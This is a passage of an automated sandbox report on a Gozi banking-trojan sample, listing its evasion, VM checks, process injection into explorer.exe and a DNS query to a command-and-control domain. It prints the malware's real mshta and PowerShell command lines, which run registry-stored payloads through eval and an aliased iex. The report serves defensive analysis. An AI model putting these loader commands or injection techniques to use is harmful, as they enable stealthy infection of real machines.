Found evasive API chain (date check)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4982			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4237			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 3.9 %

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_03F18409

Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000029.00000000.614665708.00000163C4E00000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.487973669.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000012.00000002.422959033.000002BC06C24000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: gozi.exe, 00000002.00000002.327636838.000000000153E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Enables debug privileges

Source: C:\Users\user\Desktop\gozi.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\gozi.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F016AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		8_2_03F016AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030316AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		47_2_030316AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: C:\Windows\System32\control.exe base: F00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 2B40000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 20FDE800000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D50000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580

Writes to foreign memory regions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: F00000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 93E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 2B40000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 20FDE800000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057C000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E2E000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 93E000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AE0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 2B40000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 5676	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4364
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440
Source: C:\Windows\explorer.exe	Thread register set: target process: 6020

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001F.00000000.484628610.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.505140631.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.503987373.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.488892190.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.493795912.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.495291649.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.514646186.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

8_2_00401AFE

Queries the installation date of Windows

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Users\user\Desktop\gozi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
